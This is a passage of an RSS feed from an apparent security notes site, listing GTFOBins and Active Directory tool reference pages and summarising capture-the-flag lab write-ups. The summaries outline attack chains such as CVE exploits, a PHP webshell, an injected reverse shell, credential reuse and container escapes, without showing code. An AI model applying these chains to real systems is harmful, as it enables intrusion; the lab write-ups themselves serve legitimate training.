+0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/systemd-resolve/</guid><description/></item><item><title>systemd-run</title><link>https://bokkapig.pages.dev/refs/gtfobins/systemd-run/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/systemd-run/</guid><description/></item><item><title>tac</title><link>https://bokkapig.pages.dev/refs/gtfobins/tac/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tac/</guid><description/></item><item><title>tail</title><link>https://bokkapig.pages.dev/refs/gtfobins/tail/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tail/</guid><description/></item><item><title>tailscale</title><link>https://bokkapig.pages.dev/refs/gtfobins/tailscale/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tailscale/</guid><description/></item><item><title>tar</title><link>https://bokkapig.pages.dev/refs/gtfobins/tar/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tar/</guid><description/></item><item><title>task</title><link>https://bokkapig.pages.dev/refs/gtfobins/task/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/task/</guid><description/></item><item><title>taskset</title><link>https://bokkapig.pages.dev/refs/gtfobins/taskset/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/taskset/</guid><description/></item><item><title>tasksh</title><link>https://bokkapig.pages.dev/refs/gtfobins/tasksh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tasksh/</guid><description/></item><item><title>tbl</title><link>https://bokkapig.pages.dev/refs/gtfobins/tbl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tbl/</guid><description/></item><item><title>tclsh</title><link>https://bokkapig.pages.dev/refs/gtfobins/tclsh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tclsh/</guid><description/></item><item><title>tcpdump</title><link>https://bokkapig.pages.dev/refs/gtfobins/tcpdump/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tcpdump/</guid><description/></item><item><title>tcsh</title><link>https://bokkapig.pages.dev/refs/gtfobins/tcsh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tcsh/</guid><description/></item><item><title>tdbtool</title><link>https://bokkapig.pages.dev/refs/gtfobins/tdbtool/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tdbtool/</guid><description/></item><item><title>tee</title><link>https://bokkapig.pages.dev/refs/gtfobins/tee/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tee/</guid><description/></item><item><title>telnet</title><link>https://bokkapig.pages.dev/refs/gtfobins/telnet/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/telnet/</guid><description/></item><item><title>terraform</title><link>https://bokkapig.pages.dev/refs/gtfobins/terraform/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/terraform/</guid><description/></item><item><title>tex</title><link>https://bokkapig.pages.dev/refs/gtfobins/tex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tex/</guid><description/></item><item><title>tftp</title><link>https://bokkapig.pages.dev/refs/gtfobins/tftp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tftp/</guid><description/></item><item><title>tic</title><link>https://bokkapig.pages.dev/refs/gtfobins/tic/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tic/</guid><description/></item><item><title>time</title><link>https://bokkapig.pages.dev/refs/gtfobins/time/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/time/</guid><description/></item><item><title>timedatectl</title><link>https://bokkapig.pages.dev/refs/gtfobins/timedatectl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/timedatectl/</guid><description/></item><item><title>timeout</title><link>https://bokkapig.pages.dev/refs/gtfobins/timeout/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/timeout/</guid><description/></item><item><title>tmate</title><link>https://bokkapig.pages.dev/refs/gtfobins/tmate/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tmate/</guid><description/></item><item><title>tmux</title><link>https://bokkapig.pages.dev/refs/gtfobins/tmux/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tmux/</guid><description/></item><item><title>top</title><link>https://bokkapig.pages.dev/refs/gtfobins/top/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/top/</guid><description/></item><item><title>torify</title><link>https://bokkapig.pages.dev/refs/gtfobins/torify/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/torify/</guid><description/></item><item><title>torsocks</title><link>https://bokkapig.pages.dev/refs/gtfobins/torsocks/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/torsocks/</guid><description/></item><item><title>troff</title><link>https://bokkapig.pages.dev/refs/gtfobins/troff/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/troff/</guid><description/></item><item><title>tsc</title><link>https://bokkapig.pages.dev/refs/gtfobins/tsc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tsc/</guid><description/></item><item><title>tshark</title><link>https://bokkapig.pages.dev/refs/gtfobins/tshark/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/tshark/</guid><description/></item><item><title>ul</title><link>https://bokkapig.pages.dev/refs/gtfobins/ul/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ul/</guid><description/></item><item><title>unexpand</title><link>https://bokkapig.pages.dev/refs/gtfobins/unexpand/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/unexpand/</guid><description/></item><item><title>uniq</title><link>https://bokkapig.pages.dev/refs/gtfobins/uniq/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/uniq/</guid><description/></item><item><title>unshare</title><link>https://bokkapig.pages.dev/refs/gtfobins/unshare/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/unshare/</guid><description/></item><item><title>unsquashfs</title><link>https://bokkapig.pages.dev/refs/gtfobins/unsquashfs/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/unsquashfs/</guid><description/></item><item><title>unzip</title><link>https://bokkapig.pages.dev/refs/gtfobins/unzip/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/unzip/</guid><description/></item><item><title>update-alternatives</title><link>https://bokkapig.pages.dev/refs/gtfobins/update-alternatives/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/update-alternatives/</guid><description/></item><item><title>urlget</title><link>https://bokkapig.pages.dev/refs/gtfobins/urlget/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/urlget/</guid><description/></item><item><title>uuencode</title><link>https://bokkapig.pages.dev/refs/gtfobins/uuencode/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/uuencode/</guid><description/></item><item><title>uv</title><link>https://bokkapig.pages.dev/refs/gtfobins/uv/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/uv/</guid><description/></item><item><title>vagrant</title><link>https://bokkapig.pages.dev/refs/gtfobins/vagrant/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/vagrant/</guid><description/></item><item><title>valgrind</title><link>https://bokkapig.pages.dev/refs/gtfobins/valgrind/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/valgrind/</guid><description/></item><item><title>varnishncsa</title><link>https://bokkapig.pages.dev/refs/gtfobins/varnishncsa/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/varnishncsa/</guid><description/></item><item><title>vi</title><link>https://bokkapig.pages.dev/refs/gtfobins/vi/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/vi/</guid><description/></item><item><title>view</title><link>https://bokkapig.pages.dev/refs/gtfobins/view/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/view/</guid><description/></item><item><title>vigr</title><link>https://bokkapig.pages.dev/refs/gtfobins/vigr/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/vigr/</guid><description/></item><item><title>vim</title><link>https://bokkapig.pages.dev/refs/gtfobins/vim/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/vim/</guid><description/></item><item><title>vimdiff</title><link>https://bokkapig.pages.dev/refs/gtfobins/vimdiff/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/vimdiff/</guid><description/></item><item><title>vipw</title><link>https://bokkapig.pages.dev/refs/gtfobins/vipw/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/vipw/</guid><description/></item><item><title>virsh</title><link>https://bokkapig.pages.dev/refs/gtfobins/virsh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/virsh/</guid><description/></item><item><title>volatility</title><link>https://bokkapig.pages.dev/refs/gtfobins/volatility/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/volatility/</guid><description/></item><item><title>w3m</title><link>https://bokkapig.pages.dev/refs/gtfobins/w3m/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/w3m/</guid><description/></item><item><title>wall</title><link>https://bokkapig.pages.dev/refs/gtfobins/wall/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/wall/</guid><description/></item><item><title>watch</title><link>https://bokkapig.pages.dev/refs/gtfobins/watch/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/watch/</guid><description/></item><item><title>wc</title><link>https://bokkapig.pages.dev/refs/gtfobins/wc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/wc/</guid><description/></item><item><title>wg-quick</title><link>https://bokkapig.pages.dev/refs/gtfobins/wg-quick/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/wg-quick/</guid><description/></item><item><title>wget</title><link>https://bokkapig.pages.dev/refs/gtfobins/wget/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/wget/</guid><description/></item><item><title>whiptail</title><link>https://bokkapig.pages.dev/refs/gtfobins/whiptail/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/whiptail/</guid><description/></item><item><title>whois</title><link>https://bokkapig.pages.dev/refs/gtfobins/whois/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/whois/</guid><description/></item><item><title>wireshark</title><link>https://bokkapig.pages.dev/refs/gtfobins/wireshark/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/wireshark/</guid><description/></item><item><title>wish</title><link>https://bokkapig.pages.dev/refs/gtfobins/wish/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/wish/</guid><description/></item><item><title>xargs</title><link>https://bokkapig.pages.dev/refs/gtfobins/xargs/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xargs/</guid><description/></item><item><title>xdg-user-dir</title><link>https://bokkapig.pages.dev/refs/gtfobins/xdg-user-dir/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xdg-user-dir/</guid><description/></item><item><title>xdotool</title><link>https://bokkapig.pages.dev/refs/gtfobins/xdotool/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xdotool/</guid><description/></item><item><title>xelatex</title><link>https://bokkapig.pages.dev/refs/gtfobins/xelatex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xelatex/</guid><description/></item><item><title>xetex</title><link>https://bokkapig.pages.dev/refs/gtfobins/xetex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xetex/</guid><description/></item><item><title>xmodmap</title><link>https://bokkapig.pages.dev/refs/gtfobins/xmodmap/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xmodmap/</guid><description/></item><item><title>xmore</title><link>https://bokkapig.pages.dev/refs/gtfobins/xmore/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xmore/</guid><description/></item><item><title>xpad</title><link>https://bokkapig.pages.dev/refs/gtfobins/xpad/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xpad/</guid><description/></item><item><title>xxd</title><link>https://bokkapig.pages.dev/refs/gtfobins/xxd/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xxd/</guid><description/></item><item><title>xz</title><link>https://bokkapig.pages.dev/refs/gtfobins/xz/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/xz/</guid><description/></item><item><title>yarn</title><link>https://bokkapig.pages.dev/refs/gtfobins/yarn/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/yarn/</guid><description/></item><item><title>yash</title><link>https://bokkapig.pages.dev/refs/gtfobins/yash/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/yash/</guid><description/></item><item><title>yelp</title><link>https://bokkapig.pages.dev/refs/gtfobins/yelp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/yelp/</guid><description/></item><item><title>yt-dlp</title><link>https://bokkapig.pages.dev/refs/gtfobins/yt-dlp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/yt-dlp/</guid><description/></item><item><title>yum</title><link>https://bokkapig.pages.dev/refs/gtfobins/yum/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/yum/</guid><description/></item><item><title>zathura</title><link>https://bokkapig.pages.dev/refs/gtfobins/zathura/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/zathura/</guid><description/></item><item><title>zcat</title><link>https://bokkapig.pages.dev/refs/gtfobins/zcat/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/zcat/</guid><description/></item><item><title>zgrep</title><link>https://bokkapig.pages.dev/refs/gtfobins/zgrep/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/zgrep/</guid><description/></item><item><title>zic</title><link>https://bokkapig.pages.dev/refs/gtfobins/zic/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/zic/</guid><description/></item><item><title>zip</title><link>https://bokkapig.pages.dev/refs/gtfobins/zip/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/zip/</guid><description/></item><item><title>zless</title><link>https://bokkapig.pages.dev/refs/gtfobins/zless/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/zless/</guid><description/></item><item><title>zsh</title><link>https://bokkapig.pages.dev/refs/gtfobins/zsh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/zsh/</guid><description/></item><item><title>zsoelim</title><link>https://bokkapig.pages.dev/refs/gtfobins/zsoelim/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/zsoelim/</guid><description/></item><item><title>zypper</title><link>https://bokkapig.pages.dev/refs/gtfobins/zypper/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/zypper/</guid><description/></item><item><title>Silentium</title><link>https://bokkapig.pages.dev/writeups/silentium/</link><pubDate>Sat, 11 Apr 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/silentium/</guid><description>A staging Flowise 3.0.5 instance leaks a live password-reset token straight back in the /api/v1/account/forgot-password response (CVE-2025-58434), giving instant takeover of the &lt;a href="mailto:ben@silentium.htb"&gt;ben@silentium.htb&lt;/a&gt; admin account. Authenticated, the Custom MCP node&amp;rsquo;s mcpServerConfig (CVE-2025-59528) spawns arbitrary processes, yielding root inside the Flowise container — whose environment block hands over SMTP_PASSWORD, reused verbatim as ben&amp;rsquo;s system password over SSH. Root comes from a second internal app: Gogs 0.13.3 running as root with open registration, where CVE-2025-8110 lets the contents API write through a committed symlink to overwrite the repository&amp;rsquo;s pre-receive hook, executed as root on the next push.</description></item><item><title>DevArea</title><link>https://bokkapig.pages.dev/writeups/devarea/</link><pubDate>Sat, 28 Mar 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/devarea/</guid><description>Anonymous FTP exposed a Java SOAP service JAR; an MTOM XXE attack against the CXF endpoint leaked the Hoverfly admin password from a systemd unit file, then authenticated RCE via Hoverfly middleware yielded a shell as dev_ryan; privilege escalation exploited a world-writable /bin/bash by writing a SUID-creating wrapper triggered by a root-owned systemd timer.</description></item><item><title>Kobold</title><link>https://bokkapig.pages.dev/writeups/kobold/</link><pubDate>Sat, 21 Mar 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/kobold/</guid><description>MCP Inspector STDIO RCE for foothold, PHP code injection in PrivateBin container to leak credentials, Docker escape via Arcane container management.</description></item><item><title>VariaType</title><link>https://bokkapig.pages.dev/writeups/variatype/</link><pubDate>Sat, 14 Mar 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/variatype/</guid><description>Exploited fonttools CVE-2025-66034 designspace path traversal to write a PHP webshell, escalated to user via FontForge archive command injection, then root via setuptools PackageIndex arbitrary file write to cron.d.</description></item><item><title>CCTV</title><link>https://bokkapig.pages.dev/writeups/cctv/</link><pubDate>Sat, 07 Mar 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/cctv/</guid><description>Default ZoneMinder credentials lead to RCE as www-data. Lateral movement via cracked bcrypt hash to SSH as mark, then sniffing Docker inter-container traffic for sa_mark credentials. Privilege escalation by abusing motionEye running as root to inject a reverse shell into camera event hooks.</description></item><item><title>Interpreter</title><link>https://bokkapig.pages.dev/writeups/interpreter/</link><pubDate>Sat, 21 Feb 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/interpreter/</guid><description>Pre-auth RCE via CVE-2023-43208 XStream deserialization in Mirth Connect 4.4.0, lateral movement through MySQL credential extraction and password hash replacement, privilege escalation via Python eval() injection in an internal Flask notification app running as root.</description></item><item><title>WingData</title><link>https://bokkapig.pages.dev/writeups/wingdata/</link><pubDate>Sat, 14 Feb 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/wingdata/</guid><description>Unauthenticated RCE in Wing FTP Server v7.4.3 via NULL byte Lua injection (CVE-2025-47812), lateral movement through cracked FTP user password hash, and root via Python tarfile data filter PATH_MAX bypass (CVE-2025-4517).</description></item><item><title>Pterodactyl</title><link>https://bokkapig.pages.dev/writeups/pterodactyl/</link><pubDate>Sat, 07 Feb 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/pterodactyl/</guid><description>Unauthenticated RCE via Pterodactyl Panel LFI (CVE-2025-49132), credential reuse for SSH, then privilege escalation via PAM session injection (CVE-2025-6018) chained with udisks2 XFS resize race condition (CVE-2025-6019) to obtain root.</description></item><item><title>Facts</title><link>https://bokkapig.pages.dev/writeups/facts/</link><pubDate>Sat, 31 Jan 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/facts/</guid><description>Exploited CamaleonCMS path traversal (CVE-2024-46987) to extract MinIO credentials and an encrypted SSH key, then escalated via sudo facter &amp;ndash;custom-dir to root.</description></item><item><title>Overwatch</title><link>https://bokkapig.pages.dev/writeups/overwatch/</link><pubDate>Sat, 24 Jan 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/overwatch/</guid><description>Windows AD DC with anonymous SMB share leaking .NET app credentials, MSSQL linked server DNS poisoning for credential capture, and WCF SOAP service command injection for SYSTEM access.</description></item><item><title>AirTouch</title><link>https://bokkapig.pages.dev/writeups/airtouch/</link><pubDate>Sat, 17 Jan 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/airtouch/</guid><description>WiFi-centric box involving SNMP credential leak, WPA PSK cracking, web app file upload via cookie manipulation, WPA-Enterprise evil twin attack, and hostapd-wpe EAP user file credential disclosure for privilege escalation.</description></item><item><title>Browsed</title><link>https://bokkapig.pages.dev/writeups/browsed/</link><pubDate>Sat, 10 Jan 2026 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/browsed/</guid><description>Malicious Chrome MV3 extension uploaded to server-side browser achieved RCE via bash arithmetic evaluation in a Flask/bash backend, then escalated to root via .pyc injection into a world-writable &lt;strong&gt;pycache&lt;/strong&gt; directory of a sudo-allowed Python script.</description></item><item><title>MonitorsFour</title><link>https://bokkapig.pages.dev/writeups/monitorfour/</link><pubDate>Sat, 06 Dec 2025 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/monitorfour/</guid><description>IDOR credential leak, Cacti SQL injection to stacked-query log poisoning RCE, and Docker Desktop API escape to root.</description></item><item><title>Expressway</title><link>https://bokkapig.pages.dev/writeups/expressway/</link><pubDate>Thu, 20 Nov 2025 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/expressway/</guid><description>IKEv1 Aggressive Mode PSK hash capture and offline brute-force reveals SSH credentials; custom sudo 1.9.17 binary is exploited via CVE-2025-32463 NSS library injection to achieve root.</description></item><item><title>Baby</title><link>https://bokkapig.pages.dev/writeups/baby/</link><pubDate>Tue, 18 Nov 2025 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/baby/</guid><description>LDAP anonymous bind leaks an initial password in a user description; the target user (Caroline.Robinson) has STATUS_PASSWORD_MUST_CHANGE set, allowing password reset via SAMR; Backup Operators group membership enables direct flag read via FILE_OPEN_FOR_BACKUP_INTENT over SMB.</description></item><item><title>Eighteen</title><link>https://bokkapig.pages.dev/writeups/eighteen/</link><pubDate>Sat, 15 Nov 2025 00:00:00 +0000</pubDate><guid>https://bokkapig.pages.dev/writeups/eighteen/</guid><description>Windows Server 2025 DC with MSSQL impersonation leading to credential extraction, password spray for WinRM access, and BadSuccessor dMSA privilege escalation to Domain Admin.</description></item><item><title>ADCSEnumaration</title><link>https://bokkapig.pages.dev/refs/wadcoms/adcsenumaration/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/adcsenumaration/</guid><description/></item><item><title>BloodHound.py Remote Ingestion</title><link>https://bokkapig.pages.dev/refs/wadcoms/bloodhound-py-remote-ingestion/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/bloodhound-py-remote-ingestion/</guid><description/></item><item><title>BloodHound.py Remote Ingestion Creds</title><link>https://bokkapig.pages.dev/refs/wadcoms/bloodhound-py-remote-ingestion-creds/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/bloodhound-py-remote-ingestion-creds/</guid><description/></item><item><title>bloodyAD Wite Properties</title><link>https://bokkapig.pages.dev/refs/wadcoms/bloodyad-wite-properties/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/bloodyad-wite-properties/</guid><description/></item><item><title>CredDumpWithoutMimilkatz</title><link>https://bokkapig.pages.dev/refs/wadcoms/creddumpwithoutmimilkatz/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/creddumpwithoutmimilkatz/</guid><description/></item><item><title>Dementor</title><link>https://bokkapig.pages.dev/refs/wadcoms/dementor/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/dementor/</guid><description/></item><item><title>Enum4Linux Creds</title><link>https://bokkapig.pages.dev/refs/wadcoms/enum4linux-creds/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/enum4linux-creds/</guid><description/></item><item><title>enum4linux ng</title><link>https://bokkapig.pages.dev/refs/wadcoms/enum4linux-ng/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/enum4linux-ng/</guid><description/></item><item><title>Enum4Linux NoCreds</title><link>https://bokkapig.pages.dev/refs/wadcoms/enum4linux-nocreds/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/enum4linux-nocreds/</guid><description/></item><item><title>Evil WinRM</title><link>https://bokkapig.pages.dev/refs/wadcoms/evil-winrm/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/evil-winrm/</guid><description/></item><item><title>Evil Winrm PKINIT</title><link>https://bokkapig.pages.dev/refs/wadcoms/evil-winrm-pkinit/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/evil-winrm-pkinit/</guid><description/></item><item><title>Evil WinRM PTH</title><link>https://bokkapig.pages.dev/refs/wadcoms/evil-winrm-pth/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/evil-winrm-pth/</guid><description/></item><item><title>FindUncommonShares</title><link>https://bokkapig.pages.dev/refs/wadcoms/finduncommonshares/</link><pubDate>Sat, 30 Aug 2025 01:53:11 +1000</pubDate><guid>https://bokkapig.pages.dev/refs/wadcoms/finduncommonshares/</guid><description/></item><item><title>Impacket addcomputer LDAPS</title><link>https://bokkapig.pages.dev/refs/wadcoms/impacket-addcomputer-ldaps/</link><pubDate>Sat, 30 Aug 2025 01:53:11 